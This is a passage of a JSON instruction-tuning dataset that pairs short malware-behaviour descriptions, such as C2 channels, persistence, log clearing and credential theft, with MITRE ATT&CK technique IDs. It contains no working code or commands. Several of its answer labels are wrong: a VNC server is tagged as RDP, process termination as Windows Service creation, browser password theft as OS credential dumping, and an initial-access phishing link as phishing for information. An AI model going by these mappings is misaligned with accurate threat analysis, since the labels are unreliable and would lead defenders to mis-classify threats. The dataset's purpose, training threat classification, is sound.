+ }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After using raw sockets to communicate with its C2 server, uses a decrypted string to create HTTP POST requests.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A JavaScript backdoor has used Google Apps Script as its C2 server.", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"allows adversaries to modify the way the \"\"beacon\"\" payload communicates. This is called \"\"Malleable C2\"\" in the manual and is intended to allow a penetration test team to mimic known APT C2 methods.\"", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A malware sample adds persistence on the system by creating a shortcut in the user\u2019s Startup folder.", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A malware sample performs reflective DLL injection.", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "An downloader establishes SOCKS5 connections for its initial C2.", + "output": "- T1090: Proxy\n- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "An downloader first establishes a SOCKS5 connection to 192.157.198[.]103 using TCP port 1913; once the server response is verified, it then requests a connection to 192.184.60[.]229 on TCP port 81.", + "output": "- T1104: Multi-Stage Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "An HTTP malware variant used Base64 to encode communications to the C2 server.", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download.", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.", + "output": "- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "attempts to access the ADMIN$, C$\\Windows, D$\\Windows, and E$\\Windows shares on the victim with its current privileges.", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A variant uses fake TLS to communicate with the C2 server.", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A Word document delivering prompts the user to enable macro execution.", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Based on comparison of versions, made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe.", + "output": "- T1027.005: Obfuscated Files or Information - Indicator Removal from Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Before being appended to image files, commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "C2 servers communicated with malware over TCP 8081, 8282, and 8083.", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo! messengers.", + "output": "- T1001: Data Obfuscation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can add or remove applications or ports on the Windows firewall or disable it entirely.", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can alter the victim's proxy configuration.", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can be configured to use multiple network protocols to avoid network-based detection.", + "output": "- T1026: Multiband Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed.", + "output": "- T1546.007: Event Triggered Execution - Netsh Helper DLL" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can be used to create to upload files from a compromised host.", + "output": "- T1048: Exfiltration Over Alternative Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can be used to subvert controls and possibly conceal command execution by not directly invoking .", + "output": "- T1202: Indirect Command Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can disable Microsoft Office Protected View by changing Registry keys.", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can download files off the target system to send back to the server.", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can download remote files.", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can establish persistence by creating a .lnk file in the Start menu.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can establish using a AppCertDLLs Registry key.", + "output": "- T1546.009: Event Triggered Execution - AppCert DLLs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can exploit vulnerabilities such as MS14-058.", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can gather browser usernames and passwords.", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can obtain passwords from common browsers and FTP clients.", + "output": "- T1003: OS Credential Dumping\n- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can obtain the victim user name.", + "output": "- T1069: Permission Groups Discovery\n- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can overwrite Registry settings to reduce its visibility on the victim.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can retrieve usernames from compromised hosts.", + "output": "- T1087: Account Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can run a command on another machine using .", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can scan local network for open SMB.", + "output": "- T1135: Network Share Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"can set its \"\"beacon\"\" payload to reach out to the C2 server on an arbitrary and random interval. In addition it will break large data sets into smaller chunks for exfiltration.\"", + "output": "- T1029: Scheduled Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can sleep for a specific time and be set to communicate at specific intervals.", + "output": "- T1029: Scheduled Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel.", + "output": "- T1021.001: Remote Services - Remote Desktop Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can terminate a specific process by its process id.", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can use the command-line utility cacls.exe to change file permissions.", + "output": "- T1059: Command and Scripting Interpreter\n- T1222: File and Directory Permissions Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "can use Windows Authentication Packages for persistence.", + "output": "- T1547.002: Boot or Logon Autostart Execution - Authentication Package" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "captured screenshots and desktop video recordings.", + "output": "- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "captures and DES-encrypts credentials before writing the username and password to a log file, C:\\log.txt.", + "output": "- T1056: Input Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "clears event logs.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "clears the system event logs.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "collects a list of install programs and services on the system\u2019s machine.", + "output": "- T1007: System Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server.", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Commands under net user can be used in to gather information about and manipulate user accounts.", + "output": "- T1087: Account Discovery" + }, + 